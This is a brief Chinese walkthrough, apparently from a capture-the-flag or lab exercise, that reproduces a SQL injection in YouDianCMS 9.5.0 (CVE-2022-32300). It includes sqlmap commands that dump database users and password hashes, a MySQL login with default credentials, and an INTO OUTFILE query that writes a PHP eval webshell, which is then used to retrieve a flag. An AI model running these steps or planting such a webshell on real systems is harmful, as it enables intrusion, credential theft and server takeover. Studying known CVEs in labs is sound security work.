名称: youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
描述: 友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。 通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。 数据库:root/root 数据库名:youdian
复现:
安装
查询漏洞信息可知,漏洞发生位置位于
/index.php/Admin/mail/viewLog?MailSendID=1
登陆后台使用被动扫描访问该地址,Xray成功扫描出该地址存在sql注入漏洞
然后使用sqlmap一把梭,注意,这里需要使用抓包方式注入,因为是后台sql注入,会校验cookie,直接复制xray数据包,删除payload进行注入
python2 sqlmap.py -r data.txt
读取用户名
python2 sqlmap.py -r data.txt --users --threads 10
读取密码
python2 sqlmap.py -r data.txt --passwords --threads 10
然后使用cmd5解密
Mysql连接
mysql -uroot -proot -hip -P port
获取网站绝对路径,这里发现在访问install.php时会泄露网站绝对路径
构造payload,写入一句话木马
SELECT "<?php eval(@$_POST['password']);?> " INTO OUTFILE '/var/www/wordpress/include/Db/1.php';
写入成功后,蚁剑连接
成功获取flag
/tmp/flag-{bmh45e6ef4a-dc8c-4fe3-824f-eeba237afa20}